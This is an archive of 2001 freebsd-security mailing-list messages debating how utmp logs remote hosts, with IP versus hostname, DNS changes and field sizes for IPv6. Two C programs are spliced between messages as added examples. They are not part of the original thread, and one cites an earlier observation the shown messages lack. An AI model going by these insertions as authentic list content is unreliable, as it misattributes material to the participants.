Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 0373337B407; Sun, 22 Jul 2001 17:25:20 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0PII00884; Mon, 23 Jul 2001 01:25:18 +0100 (BST) (envelope-from brian@lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6N0PHg12049; Mon, 23 Jul 2001 01:25:17 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200107230025.f6N0PHg12049@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: "Jeroen Massar"
Cc: "'Matt Dillon'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, brian@Awfulhak.org, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: Message from "Jeroen Massar" of "Mon, 23 Jul 2001 01:58:33 +0200." <000701c1130a$393e27e0$420d640a@HELL>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 23 Jul 2001 01:25:17 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> Even then.... IMHO one should log both hostname _AND_ IP...

I don't think that's necessary.

> Following situation:
>
> 23 June 2001 - I log into a machine from 10.1.2.3 which maps to
> bla.example.com which points to 10.1.2.3 thus bla.example.com is
> logged...
> 24 June 2001 - The bla.example.com A is changed to 192.168.2.1,
> 192.168.2.1 gets pointed back to bla.example.com...
>
> Now I actually did very evil things with that box on the 23rd.... So the
> admin of the box wants to hunt me down and checks his/her/its logs:
> Ooe..... that evil user came from 'bla.example.com' let's find out
> his/her/its IP....aha 192.168.2.1 <-------- OOOPS... Not even the same
> provider I actually came from to do all those very evil things...
>
> So long for your 'nice' logging facility... (and thanks for all the
> fish... :) I know... It's been there for a long time and over many many
> unices but that doesn't say it's still acceptable...

The owner of what's logged will know the answer -- in this case, talking to the admins of bla.example.com will result in them saying ``ah, that box had its IP number changed''. I think the way this is done is as appropriate as it ever was.

> Only storing the IP is useless too of course.. Because then you never
> know what the old hostname (for which you actually accepted) was...
> Especially if you got /etc/hosts.allow with the old reverse in it, but
> not the new one etc...

Your tcp-wrapper rules are subject to the same DNS confusion as the utmp file is, but I don't think there's anything wrong with that. If you don't trust the admin of example.com, then block the whole domain :) But that's another argument^Wdiscussion....

> Greets,
> Jeroen

--
Brian
http://www.freebsd-services.com/
Don't _EVER_ lose your sense of humour !
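The 23/24 June scenario Jeroen describes, and Brian's reply to it, turn on what a login record actually stores and how far the stored name can be trusted later. The C program below is an added example written for this archive page, not code from the thread or from FreeBSD: it models a record that keeps the peer's binary address and address family alongside the reverse name, and writes the name only when a forward lookup confirms it (forward-confirmed reverse DNS). DNS is replaced by two constructed lookup tables, one per date, built from the thread's example names and addresses; the table contents, the struct layout and every function name here are assumptions for this example, and no network is touched.

```c
/* Added example: login record with address + confirmed reverse name,
 * checked against constructed DNS snapshots for 23 and 24 June 2001.
 * Struct, table contents and function names are assumptions. */
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

struct dns_entry { const char *name; const char *addr; };

/* One day's view of DNS. Forward (A) and reverse (PTR) tables are kept
 * separately because nothing forces the two to agree. */
struct dns_snapshot {
    const char *date;
    const struct dns_entry *fwd; size_t nfwd;   /* name -> addr */
    const struct dns_entry *rev; size_t nrev;   /* addr -> name */
};

/* Constructed data (not real DNS). 23 June: bla.example.com <-> 10.1.2.3,
 * plus one PTR whose name has no matching A record. */
static const struct dns_entry fwd_0623[] = { { "bla.example.com", "10.1.2.3" } };
static const struct dns_entry rev_0623[] = { { "bla.example.com", "10.1.2.3" },
                                             { "other.example.net", "10.9.9.9" } };
/* 24 June: the same name now points at 192.168.2.1 and back. */
static const struct dns_entry fwd_0624[] = { { "bla.example.com", "192.168.2.1" } };
static const struct dns_entry rev_0624[] = { { "bla.example.com", "192.168.2.1" } };

const struct dns_snapshot snap_0623 = { "23 June 2001", fwd_0623, 1, rev_0623, 2 };
const struct dns_snapshot snap_0624 = { "24 June 2001", fwd_0624, 1, rev_0624, 1 };

const char *lookup_forward(const struct dns_snapshot *s, const char *name)
{
    for (size_t i = 0; i < s->nfwd; i++)
        if (strcmp(s->fwd[i].name, name) == 0)
            return s->fwd[i].addr;
    return NULL;
}

const char *lookup_reverse(const struct dns_snapshot *s, const char *addr)
{
    for (size_t i = 0; i < s->nrev; i++)
        if (strcmp(s->rev[i].addr, addr) == 0)
            return s->rev[i].name;
    return NULL;
}

/* Forward-confirmed reverse DNS: the PTR name counts only if its A record
 * points back at the address the connection actually came from. */
int fcrdns_ok(const struct dns_snapshot *s, const char *addr)
{
    const char *name = lookup_reverse(s, addr);
    const char *back = name ? lookup_forward(s, name) : NULL;
    return back != NULL && strcmp(back, addr) == 0;
}

/* Record shape along the lines of Jeroen's sketch: name, address, family. */
struct login_record {
    char          hostname[64];   /* "" when the reverse name was not confirmed */
    unsigned char address[16];    /* in_addr or in6_addr, network byte order */
    int           address_type;   /* AF_INET or AF_INET6 */
};

/* Fill a record at login time from the peer's textual address. Returns 0,
 * or -1 if the address does not parse. The address is always stored; the
 * name only when FCrDNS confirms it. */
int record_login(struct login_record *r, const struct dns_snapshot *today, const char *peer)
{
    memset(r, 0, sizeof *r);                    /* no stale bytes reach the file */
    if (inet_pton(AF_INET6, peer, r->address) == 1)
        r->address_type = AF_INET6;
    else if (inet_pton(AF_INET, peer, r->address) == 1)
        r->address_type = AF_INET;
    else
        return -1;
    if (fcrdns_ok(today, peer))
        snprintf(r->hostname, sizeof r->hostname, "%s", lookup_reverse(today, peer));
    return 0;
}

/* The investigator's view: the address as recorded, independent of what
 * DNS says on the day the logs are read. */
const char *record_address(const struct login_record *r, char *buf, size_t len)
{
    return inet_ntop(r->address_type, r->address, buf, len);
}

int main(void)
{
    struct login_record rec;
    char buf[INET6_ADDRSTRLEN];

    record_login(&rec, &snap_0623, "10.1.2.3");
    printf("%s: logged host=%s addr=%s\n", snap_0623.date, rec.hostname,
           record_address(&rec, buf, sizeof buf));
    /* A day later the name points elsewhere; the recorded address has not moved. */
    printf("%s: %s now resolves to %s, record still says %s\n", snap_0624.date,
           rec.hostname, lookup_forward(&snap_0624, rec.hostname),
           record_address(&rec, buf, sizeof buf));
    /* A PTR that does not confirm is not written down as if it were fact. */
    record_login(&rec, &snap_0623, "10.9.9.9");
    printf("10.9.9.9: FCrDNS %s, host field \"%s\"\n",
           fcrdns_ok(&snap_0623, "10.9.9.9") ? "ok" : "failed", rec.hostname);
    return 0;
}
```

Reading the 23 June record on 24 June, the hostname field resolves to 192.168.2.1 while the address field still says 10.1.2.3, which is exactly the ambiguity Jeroen's scenario describes; the address field settles it. The FCrDNS gate addresses the other half: a PTR record is controlled by whoever owns the address block, so a name that does not resolve back is recorded as an empty field rather than as fact.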
From owner-freebsd-security Sun Jul 22 17:33:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0DA1637B406 for ; Sun, 22 Jul 2001 17:33:44 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us)
Received: from jimslaptop.int (jimslaptop.int [192.168.5.8]) by w2xo.pgh.pa.us (8.11.3/8.11.3) with ESMTP id f6N0fcm30026; Sun, 22 Jul 2001 20:41:38 -0400 (EDT) (envelope-from durham@w2xo.pgh.pa.us)
Date: Sun, 22 Jul 2001 20:33:57 -0400 (EDT)
From: Jim Durham
X-X-Sender:
To: Peter Chiu
Cc: serkoon ,
Subject: Re: rpc.statd attacks
In-Reply-To: <11065209255.20010722201224@ipfw.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, 22 Jul 2001, Peter Chiu wrote:

> Hello Jim,
>
> SYNOPSIS
>      portmap [-d] [-v] [-h bindip]
>
> You can just bind it to your internal IP.
>
>
> Sunday, July 22, 2001, 8:07:38 PM, you wrote:
>
>
> JD> On Sun, 22 Jul 2001, serkoon wrote:
>
> JD> I'm using NFS internally, so I need portmapd and 111 udp is
> JD> blocked. That's what is bothering me..
>
> --

Actually, my man page doesn't show the -v argument.. hosts_access(5) is suggested, which I have done.
-Jim

From owner-freebsd-security Sun Jul 22 18:20:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from purgatory.unfix.org (purgatory.xs4all.nl [194.109.237.229]) by hub.freebsd.org (Postfix) with ESMTP id CDC2637B42F; Sun, 22 Jul 2001 18:20:08 -0700 (PDT) (envelope-from jeroen@unfix.org)
Received: from HELL (hell.unfix.org [::ffff:10.100.13.66]) by purgatory.unfix.org (Postfix) with ESMTP id 67011319E; Mon, 23 Jul 2001 03:20:02 +0200 (CEST)
From: "Jeroen Massar"
To: "'Brian Somers'"
Cc: "'Matt Dillon'" , "'Hajimu UMEMOTO'" , , , , ,
Subject: RE: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 03:15:59 +0200
Organization: Unfix
Message-ID: <000f01c11315$094851e0$420d640a@HELL>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
Importance: Normal
In-reply-to: <200107230025.f6N0PHg12049@hak.lan.Awfulhak.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Brian Somers wrote:
>
> > Even then.... IMHO one should log both hostname _AND_ IP...

That's why I put the IMHO in there ;)

>
> I don't think that's necessary.
>
> > Following situation:
> >
> > 23 June 2001 - I log into a machine from 10.1.2.3 which maps to
> > bla.example.com which points to 10.1.2.3 thus bla.example.com is
> > logged...
> > 24 June 2001 - The bla.example.com A is changed to 192.168.2.1,
> > 192.168.2.1 gets pointed back to bla.example.com...
> >
> > Now I actually did very evil things with that box on the 23rd.... So the
> > admin of the box wants to hunt me down and checks his/her/its logs:
> > Ooe.....
> > that evil user came from 'bla.example.com' let's find out
> > his/her/its IP....aha 192.168.2.1 <-------- OOOPS... Not even the same
> > provider I actually came from to do all those very evil things...
> >
> > So long for your 'nice' logging facility... (and thanks for all the
> > fish... :) I know... It's been there for a long time and over many many
> > unices but that doesn't say it's still acceptable...
>
> The owner of what's logged will know the answer -- in this case,
> talking to the admins of bla.example.com will result in them saying
> ``ah, that box had its IP number changed''. I think the way this is
> done is as appropriate as it ever was.

Hmm... Okay.... Kind of bad reasoning.... But unless logsize is in question I don't think anybody will object to having both the IP and hostname in the file... Surely because of the confusion part... And the fact that an evil admin won't reply, but that will give the same problems :) And probably an admin doesn't even know where the host was before as they either work in teams or maybe could have been put there temporarily by another evil intruder or something :) Now if that isn't farfetched

> > Only storing the IP is useless too of course.. Because then you never
> > know what the old hostname (for which you actually accepted) was...
> > Especially if you got /etc/hosts.allow with the old reverse in it, but
> > not the new one etc...
>
> Your tcp-wrapper rules are subject to the same DNS confusion as the
> utmp file is, but I don't think there's anything wrong with that. If
> you don't trust the admin of example.com, then block the whole domain
> :) But that's another argument^Wdiscussion....

Problem being... hacked stuff.... blabla... other discussion :)

At least we are now at the point where everybody (it is everybody not? :) sees that the logging is doing very wrong (SUX :) things... :)

About the API thing..... Check the other mail... I also suggested it there...
One thing that should be considered to be done if an API is created... : make a backport to previous versions of FreeBSD and actually *BSD/Linux/* :)

This also encourages program writers/maintainers to adopt it quicker, as it's less hassle for them and they don't have to make the "pre-FreeBSD-5" case or something...

And the best thing of an API (if done right :): separation of the back and the frontend... which makes changes like this even easier...

Greets,
Jeroen

From owner-freebsd-security Sun Jul 22 20:55:07 2001
Delivered-To: freebsd-security@freebsd.org
Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 4FD4237B406; Sun, 22 Jul 2001 20:55:03 -0700 (PDT) (envelope-from dillon@earth.backplane.com)
Received: (from dillon@localhost) by earth.backplane.com (8.11.4/8.11.2) id f6N3stj13517; Sun, 22 Jul 2001 20:54:55 -0700 (PDT) (envelope-from dillon)
Date: Sun, 22 Jul 2001 20:54:55 -0700 (PDT)
From: Matt Dillon
Message-Id: <200107230354.f6N3stj13517@earth.backplane.com>
To: "Jeroen Massar"
Cc: "'Brian Somers'" , "'Hajimu UMEMOTO'" , , , , ,
Subject: Re: RE: bin/22595: telnetd tricked into using arbitrary peer ip
References: <000f01c11315$094851e0$420d640a@HELL>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

All very nice, guys, but not realistic. Only FreeBSD uses an API. Third party programs access the structure directly for the most part so adding new fields to the structure will just cause more garbage to be written to the file (many third party programs don't bother to bzero the structure before writing it out). We aren't going to add a separate hostname[] array...
we just got through ripping out the hostname crap, because there was never enough room in the field to actually store the FQDN, and many programs don't bother to verify the forward against the reverse anyway so the data would be suspect. And short of making a 200+ character array to hold it, which would be massive bloat, there is no way to fit it in the structure. If you want to store host names for posterity you will have to log-process the file and store the results somewhere else. Every program under the sun assumes utmp is a fixed-length structure.

Pretty much our only option is to extend the size of existing fields and take the 'oh hell the structure size changed' hit.

-Matt

From owner-freebsd-security Mon Jul 23 03:12:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 03A1237B407; Mon, 23 Jul 2001 03:12:46 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NAChI03739; Mon, 23 Jul 2001 11:12:43 +0100 (BST) (envelope-from brian@lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NACgg60192; Mon, 23 Jul 2001 11:12:42 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200107231012.f6NACgg60192@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: Matt Dillon
Cc: "Jeroen Massar" , "'Brian Somers'" , "'Hajimu UMEMOTO'" , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG, brian@Awfulhak.org
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: Message from Matt Dillon of "Sun, 22 Jul 2001 20:54:55 PDT."
    <200107230354.f6N3stj13517@earth.backplane.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 23 Jul 2001 11:12:42 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> All very nice, guys, but not realistic. Only FreeBSD uses an API.
> Third party programs access the structure directly for the most
> part so adding new fields to the structure will just cause more
> garbage to be written to the file (many third party programs
> don't bother to bzero the structure before writing it out). We
> aren't going to add a separate hostname[] array... we just got
> through ripping out the hostname crap, because there was never
> enough room in the field to actually store the FQDN, and many
> programs don't bother to verify the forward against the
> reverse anyway so the data would be suspect. And short
> of making a 200+ character array to hold it, which would be massive
> bloat, there is no way to fit it in the structure. If you want to store
> host names for posterity you will have to log-process the file and
> store the results somewhere else. Every program under the sun assumes
> utmp is a fixed-length structure.
>
> Pretty much our only option is to extend the size of existing fields
> and take the 'oh hell the structure size changed' hit.

Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0).

Any disagreements ? Should this be brought up (explained) on -arch now ?

> -Matt

--
Brian
http://www.freebsd-services.com/
Don't _EVER_ lose your sense of humour !
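Brian's proposal above is to bump UT_HOSTSIZE to 40 and store only unscoped addresses; Matt's point is that the record is a fixed-length structure that many programs write out by hand. The C program below is an added example for this archive page, not code from the thread or from FreeBSD's utmp.h: it models the fixed-length record with the historical 16-byte host field beside the proposed 40-byte one, strips the `%scope` suffix so only the unscoped address is stored, refuses to write an address that would be silently truncated, and applies Brian's earlier colon-count observation to tell an X ``machine:screen'' entry from an IPv6 address. The field order, the `int32_t` standing in for the time field (so the 44-byte figure holds on 32- and 64-bit hosts alike), and all function and constant names are assumptions made for this example.

```c
/* Added example: model of the fixed-length utmp record at UT_HOSTSIZE 16
 * and 40, with the checks a writer needs before filling ut_host.
 * Layout, names and the int32_t time field are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define UT_LINESIZE      8
#define UT_NAMESIZE     16
#define OLD_UT_HOSTSIZE 16   /* historical value: too small for IPv6 text */
#define NEW_UT_HOSTSIZE 40   /* 39 chars of full IPv6 address plus NUL */

struct utmp_old {
    char    ut_line[UT_LINESIZE];
    char    ut_name[UT_NAMESIZE];
    char    ut_host[OLD_UT_HOSTSIZE];
    int32_t ut_time;
};

struct utmp_new {
    char    ut_line[UT_LINESIZE];
    char    ut_name[UT_NAMESIZE];
    char    ut_host[NEW_UT_HOSTSIZE];
    int32_t ut_time;
};

/* Drop a "%ifname" scope identifier in place (fec0::1%vr0 -> fec0::1).
 * Returns 1 if something was removed, 0 otherwise. */
int strip_scope(char *addr)
{
    char *pct = strchr(addr, '%');
    if (pct == NULL)
        return 0;
    *pct = '\0';
    return 1;
}

/* Count ':' characters: an X display "machine:screen" has exactly one,
 * an IPv6 address always has at least two, so the two never collide. */
enum host_kind { HOST_NAME, HOST_XDISPLAY, HOST_IPV6 };

enum host_kind classify_host(const char *host)
{
    int colons = 0;
    for (const char *p = host; *p != '\0'; p++)
        if (*p == ':')
            colons++;
    if (colons == 0)
        return HOST_NAME;
    return colons == 1 ? HOST_XDISPLAY : HOST_IPV6;
}

/* Store a peer address into a ut_host field of `size` bytes. The field is
 * zeroed first (writers that skip this leak stale bytes into the file).
 * Returns 0 on success, -1 if the unscoped address would not fit with its
 * NUL; in that case the field is left empty rather than holding a
 * misleading prefix of the real address. */
int set_ut_host(char *field, size_t size, const char *addr)
{
    char tmp[128];

    memset(field, 0, size);
    if (strlen(addr) >= sizeof tmp)
        return -1;
    strcpy(tmp, addr);
    strip_scope(tmp);
    if (strlen(tmp) >= size)
        return -1;
    memcpy(field, tmp, strlen(tmp) + 1);
    return 0;
}

int main(void)
{
    struct utmp_old o;
    struct utmp_new n;
    const char *full = "2001:0db8:0000:0000:0000:0000:0000:0001";  /* 39 chars */
    int rc;

    printf("sizeof(utmp_old)=%zu sizeof(utmp_new)=%zu\n", sizeof o, sizeof n);
    rc = set_ut_host(o.ut_host, sizeof o.ut_host, "fec0::1%vr0");
    printf("old field, fec0::1%%vr0 -> rc=%d host=\"%s\"\n", rc, o.ut_host);
    rc = set_ut_host(o.ut_host, sizeof o.ut_host, full);
    printf("old field, full address -> rc=%d host=\"%s\"\n", rc, o.ut_host);
    rc = set_ut_host(n.ut_host, sizeof n.ut_host, full);
    printf("new field, full address -> rc=%d host=\"%s\"\n", rc, n.ut_host);
    printf("host:0 is X display: %d; fec0::1 is IPv6: %d\n",
           classify_host("host:0") == HOST_XDISPLAY,
           classify_host("fec0::1") == HOST_IPV6);
    return 0;
}
```

With these widths the old record is 44 bytes and the new one 68, which is the "structure size changed" hit Matt describes for every program that reads or writes the file as a fixed-length blob. The refusal to write a truncated address is the part that matters for later investigation: a 16-byte field holding the first 15 characters of a 39-character address looks like a complete address and is not.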
From owner-freebsd-security Mon Jul 23 04:17:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 09E8437B41C; Mon, 23 Jul 2001 04:17:47 -0700 (PDT) (envelope-from brian@Awfulhak.org)
Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NBHZI04007; Mon, 23 Jul 2001 12:17:35 +0100 (BST) (envelope-from brian@lan.Awfulhak.org)
Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.4/8.11.4) with ESMTP id f6NBHYg61233; Mon, 23 Jul 2001 12:17:34 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org)
Message-Id: <200107231117.f6NBHYg61233@hak.lan.Awfulhak.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
To: Matt Dillon
Cc: Jeroen Massar , Brian Somers , Hajimu UMEMOTO , aschneid@mail.slc.edu, ras@e-gerbil.net, roam@orbitel.bg, freebsd-security@FreeBSD.ORG, freebsd-gnats-submit@FreeBSD.ORG
Subject: Re: bin/22595: telnetd tricked into using arbitrary peer ip
In-Reply-To: Message from Brian Somers of "Mon, 23 Jul 2001 03:20:02 PDT." <200107231020.f6NAK2f98702@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 23 Jul 2001 12:17:34 +0100
From: Brian Somers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Matt wrote:
> > Pretty much our only option is to extend the size of existing fields
> > and take the 'oh hell the structure size changed' hit.

I wrote:
> Ok, I agree. I think we should bump UT_HOSTSIZE to 40 then and only
> put unscoped addresses in the field (ie, fec0::1, not fec0::1%vr0).
>
> Any disagreements ?
> Should this be brought up (explained) on -arch
> now ?

Interestingly enough, OpenBSD has UT_HOSTSIZE set to 256.

--
Brian
http://www.freebsd-services.com/
Don't _EVER_ lose your sense of humour !

From owner-freebsd-security Mon Jul 23 06:19:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from purgatory.unfix.org (purgatory.xs4all.nl [194.109.237.229]) by hub.freebsd.org (Postfix) with ESMTP id 45DED37B405; Mon, 23 Jul 2001 06:18:55 -0700 (PDT) (envelope-from jeroen@unfix.org)
Received: from HELL (hell.unfix.org [::ffff:10.100.13.66]) by purgatory.unfix.org (Postfix) with ESMTP id 9D57C319E; Mon, 23 Jul 2001 15:18:44 +0200 (CEST)
From: "Jeroen Massar"
To: "'Matt Dillon'"
Cc: "'Brian Somers'" , "'Hajimu UMEMOTO'" , , , , ,
Subject: RE: RE: bin/22595: telnetd tricked into using arbitrary peer ip
Date: Mon, 23 Jul 2001 15:14:40 +0200
Organization: Unfix
Message-ID: <000f01c11379$72391a40$420d640a@HELL>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: <200107230354.f6N3stj13517@earth.backplane.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Matt Dillon wrote:
> All very nice, guys, but not realistic. Only FreeBSD uses an API.
> Third party programs access the structure directly for the most
> part so adding new fields to the structure will just cause more
> garbage to be written to the file (many third party programs
> don't bother to bzero the structure before writing it out). We
> aren't going to add a separate hostname[] array...
> we just got
> through ripping out the hostname crap, because there was never
> enough room in the field to actually store the FQDN, and many
> programs don't bother to verify the forward against the
> reverse anyway so the data would be suspect. And short
> of making a 200+ character array to hold it, which would be massive
> bloat, there is no way to fit it in the structure. If you want to store
> host names for posterity you will have to log-process the file and
> store the results somewhere else. Every program under the sun assumes
> utmp is a fixed-length structure.
>
> Pretty much our only option is to extend the size of existing fields
> and take the 'oh hell the structure size changed' hit.

So... Because they didn't account for this 40 years ago we're stuck with it??

Another proposal, because I know what you mean with the 'old programs' problem which should have been fixed a long time ago with an API :)

Quote from my other mail:
8<---
One thing that should be considered to be done if an API is created... : make a backport to previous versions of FreeBSD and actually *BSD/Linux/* :)
This also encourages program writers/maintainers to adopt it quicker, as it's less hassle for them and they don't have to make the "pre-FreeBSD-5" case or something...
And the best thing of an API (if done right :): separation of the back and the frontend... which makes changes like this even easier...
---->8

But now... Make that API log into a different way and place... We will get two wtmp/utmp files then... But then we can let the 'old' 3rd party programs log to the 'old' utmp/wtmp facility. Whenever a 'new' program using the API queries the listing function of the API then the API will simply also check the 'old' facility... Et presto ... We have a solution :)

The new solution could log to a database, file whatever you'd do with it.... Just make sure that it fits into an API...
:)

That's also one of the reasons I am kinda glad that intel simply made IA-64 not IA-32 compliant..... Away with the old stuff and backward compatibility you got emu's (or API's who know the old stuff :) for that... And Windows is going the same way too... NT != DOS ... Luckily :)

Greets,
Jeroen

From owner-freebsd-security Mon Jul 23 08:35:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 9517E37B401 for ; Mon, 23 Jul 2001 08:34:51 -0700 (PDT) (envelope-from nkritsky@internethelp.ru)
Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id TAA89914; Mon, 23 Jul 2001 19:34:39 +0400 (MSD)
Date: Mon, 23 Jul 2001 19:34:44 +0400
From: "Nickolay A.Kritsky"
X-Mailer: The Bat! (v1.49) Personal
Reply-To: "Nickolay A.Kritsky"
Organization: IHelp
X-Priority: 3 (Normal)
Message-ID: <47174164064.20010723193444@internethelp.ru>
To: "Jeroen Massar"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re[3]: bin/22595: telnetd tricked into using arbitrary peer ip
In-reply-To: <000f01c11379$72391a40$420d640a@HELL>
References: <000f01c11379$72391a40$420d640a@HELL>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hello Jeroen,

Monday, July 23, 2001, 5:14:40 PM, you wrote:

JM> Matt Dillon wrote:
>> All very nice, guys, but not realistic. Only FreeBSD uses an API.
>> Third party programs access the structure directly for the most
>> part so adding new fields to the structure will just cause more
>> garbage to be written to the file (many third party programs
>> don't bother to bzero the structure before writing it out). We
>> aren't going to add a separate hostname[] array... we just got
>> through ripping out the hostname crap, because there was never
>> enough room in the field to actually store the FQDN, and many
>> programs don't bother to verify the forward against the
>> reverse anyway so the data would be suspect. And short
>> of making a 200+ character array to hold it, which would be massive
>> bloat, there is no way to fit it in the structure. If
>> you want to store
>> host names for posterity you will have to log-process the file and
>> store the results somewhere else. Every program under
>> the sun assumes
>> utmp is a fixed-length structure.
>>
>> Pretty much our only option is to extend the size of
>> existing fields
>> and take the 'oh hell the structure size changed' hit.

JM> So... Because they didn't account for this 40 years ago we're stuck with
JM> it??

JM> Another proposal, because I know what you mean with the 'old programs'
JM> problem which should have been fixed a long time ago with an API :)

JM> Quote from my other mail:
JM> 8<---
JM> One thing that should be considered to be done if an API is created... :
JM> make a backport to previous versions of FreeBSD and actually
JM> *BSD/Linux/* :)
JM> This also encourages program writers/maintainers to adopt it quicker, as
JM> it's less hassle for them and they don't have to make the
JM> "pre-FreeBSD-5" case or something...
JM> And the best thing of an API (if done right :): separation of the back
JM> and the frontend... which makes changes like this even easier...
JM> ---->8

JM> But now... Make that API log into a different way and place...
JM> We will get two wtmp/utmp files then...
JM> But then we can let the 'old'
JM> 3rd party programs log to the 'old' utmp/wtmp facility.
JM> Whenever a 'new' program using the API queries the listing function of
JM> the API then the API will simply also check the 'old' facility... Et
JM> presto ... We have a solution :)

JM> The new solution could log to a database, file whatever you'd do with
JM> it.... Just make sure that it fits into an API... :)

Looks quite reasonable to me - I consider it the common way of solving such problems.

;-------------------------------------------
; NKritsky
; SysAdmin InternetHelp.Ru
; http://www.internethelp.ru
; mailto:nkritsky@internethelp.ru

JM> That's also one of the reasons I am kinda glad that intel simply made
JM> IA-64 not IA-32 compliant..... Away with the old stuff and backward
JM> compatibility you got emu's (or API's who know the old stuff :) for
JM> that... And Windows is going the same way too... NT != DOS ... Luckily
JM> :)

JM> Greets,
JM> Jeroen

From owner-freebsd-security Mon Jul 23 8:38:46 2001
Delivered-To: freebsd-security@freebsd.org
